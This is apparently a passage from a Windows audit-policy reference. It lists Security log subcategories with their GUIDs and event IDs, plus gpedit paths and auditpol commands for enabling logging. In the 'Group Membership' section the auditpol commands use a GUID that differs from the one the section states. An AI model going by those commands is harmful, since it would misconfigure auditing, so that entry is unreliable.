- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Typically Low on all types of computers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4782`
- `4793`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Management
- Audit Other Account Management Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-management-events)
#### Security Group Management
- Subcategory GUID: `{0CCE9237-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4728`
- `4731`
- `4732`
- `4733`
- `4734`
- `4735`
- `4764`
- `4799`
- `4727`
- `4737`
- `4728`
- `4729`
- `4730`
- `4754`
- `4755`
- `4756`
- `4757`
- `4758`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Management
- Audit Security Group Management
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-group-management)
#### User Account Management
- Subcategory GUID: `{0CCE9235-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4720`
- `4722`
- `4723`
- `4724`
- `4725`
- `4726`
- `4738`
- `4740`
- `4765`
- `4766`
- `4767`
- `4780`
- `4781`
- `4794`
- `4798`
- `5376`
- `5377`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Account Management
- Audit User Account Management
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-account-management)
### Detailed Tracking
#### DPAPI Activity
- Subcategory GUID: `{0CCE922D-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4692`
- `4693`
- `4694`
- `4695`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Detailed Tracking
- Audit DPAPI Activity
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-dpapi-activity)
#### PNP Activity
- Subcategory GUID: `{0CCE9248-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Varies, depending on how the computer is used. Typically Low.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `6416`
- `6419`
- `6420`
- `6421`
- `6422`
- `6423`
- `6424`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Detailed Tracking
- Audit PNP Activity
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-pnp-activity)
#### Process Creation
- Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4688`
- `4696`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Detailed Tracking
- Audit Process Creation
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation)
#### Process Termination
- Subcategory GUID: `{0CCE922C-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low to Medium, depending on system usage.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4689`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Detailed Tracking
- Audit Process Termination
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-termination)
#### RPC Events
- Subcategory GUID: `{0CCE922E-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `5712`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Detailed Tracking
- Audit RPC Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-rpc-events)
#### Token Right Adjusted
- Subcategory GUID: `{0CCE924A-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4703`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Detailed Tracking
- Audit Token Right Adjusted
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-token-right-adjusted)
### DS Access
#### Detailed Directory Service Replication
- Subcategory GUID: `{0CCE923E-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `These events can create a very high volume of event data on domain controllers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4928`
- `4929`
- `4930`
- `4931`
- `4934`
- `4935`
- `4936`
- `4937`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- DS Access
- Audit Detailed Directory Service Replication
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-directory-service-replication)
#### Directory Service Access
- Subcategory GUID: `{0CCE923B-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High on servers running AD DS role services.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4661`
- `4662`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- DS Access
- Audit Directory Service Access
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-access)
#### Directory Service Changes
- Subcategory GUID: `{0CCE923C-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High on Domain Controllers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `5136`
- `5137`
- `5138`
- `5139`
- `5141`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- DS Access
- Audit Directory Service Changes
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE923C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-changes)
#### Directory Service Replication
- Subcategory GUID: `{0CCE923D-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Medium on Domain Controllers`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- `4932`
- `4933`
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- DS Access
- Audit Directory Service Replication
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE923D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-replication)
### Logon/Logoff
#### Account Lockout
- Subcategory GUID: `{0CCE9217-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4625
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit Account Lockout
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-account-lockout)
#### User/Device Claims
- Subcategory GUID: `{0CCE9247-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume:
- `Low on a client computer.`
- `Medium on a domain controller or network servers.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4626
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit User/Device Claims
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-device-claims)
#### Group Membership
- Subcategory GUID: `{0CCE9249-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume:
- `Low on a client computer.`
- `Medium on a domain controller or network servers.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4627
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit Group Membership
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-group-membership)
#### IPsec Extended Mode
- Subcategory GUID: `{0CCE921A-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4978
- 4979
- 4980
- 4981
- 4982
- 4983
- 4984
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit IPsec Extended Mode
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE921A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-extended-mode)
#### IPsec Main Mode
- Subcategory GUID: `{0CCE9218-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4646
- 4650
- 4651
- 4652
- 4653
- 4655
- 4976
- 5049
- 5453
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit IPsec Main Mode
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9218-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-main-mode)
#### IPsec Quick Mode
- Subcategory GUID: `{0CCE9219-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4977
- 5451
- 5452
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit IPsec Quick Mode
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9219-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-ipsec-quick-mode)
#### Logoff
- Subcategory GUID: `{0CCE9216-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `High`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4634
- 4647
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit Logoff
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logoff)
#### Logon
- Subcategory GUID: `{0CCE9215-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume:
- `Low on a client computer.`
- `Medium on a domain controllers or network servers.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4624
- 4625
- 4648
- 4675
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit Logon
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logon)
#### Network Policy Server
- Subcategory GUID: `{0CCE9243-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Medium to High on servers that are running Network Policy Server (NPS).`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 6272
- 6273
- 6274
- 6275
- 6276
- 6277
- 6278
- 6279
- 6280
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit Network Policy Server
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-network-policy-server)
#### Other Logon/Logoff Events
- Subcategory GUID: `{0CCE921C-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4649
- 4778
- 4779
- 4800
- 4801
- 4802
- 4803
- 5378
- 5632
- 5633
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit Other Logon/Logoff Events
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-logonlogoff-events)
#### Special Logon
- Subcategory GUID: `{0CCE921B-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume:
- `Low on a client computer.`
- `Medium on a domain controllers or network servers.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4964
- 4672
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Logon/Logoff
- Audit Special Logon
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-special-logon)
### Object Access
#### Application Generated
- Subcategory GUID: `{0CCE9222-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: TBD
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4665
- 4666
- 4667
- 4668
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Application Generated
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-generated)
#### Certification Services
- Subcategory GUID: `{0CCE9221-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume: `Low to medium on servers that provide AD CS role services`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 4868
- 4869
- 4870
- 4871
- 4872
- 4873
- 4874
- 4875
- 4876
- 4877
- 4878
- 4879
- 4880
- 4881
- 4882
- 4883
- 4884
- 4885
- 4886
- 4887
- 4888
- 4889
- 4890
- 4891
- 4892
- 4893
- 4894
- 4895
- 4896
- 4897
- 4898
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Certification Services
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-certification-services)
#### Detailed File Share
- Subcategory GUID: `{0CCE9244-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume:
- `High on file servers.`
- `High on domain controllers because of SYSVOL network access required by Group Policy.`
- `Low on member servers and workstations.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 5145
If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below
```yml
- Computer Configuration
- Windows Settings
- Security Settings
- Advanced Audit Policy Configuration
- System Audit Policies - Local Group Policy Object
- Object Access
- Audit Detailed File Share
- Success and Failure
```
Alternatively you can enable logging via `auditpol` using the following command(s):
```powershell
# Enable Success audit Only
auditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable
# Enable both Success and Failure auditing
auditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable
```
If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-file-share)
#### File Share
- Subcategory GUID: `{0CCE9224-69AE-11D9-BED3-505054503030}`
- Provider: `Microsoft Windows Security Auditing`
- Channel: `Security`
- Event Volume:
- `High on file servers.`
- `High on domain controllers because of SYSVOL network access required by Group Policy.`
- `Low on member servers and workstations.`
- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)
- EventID(s):
- 5140
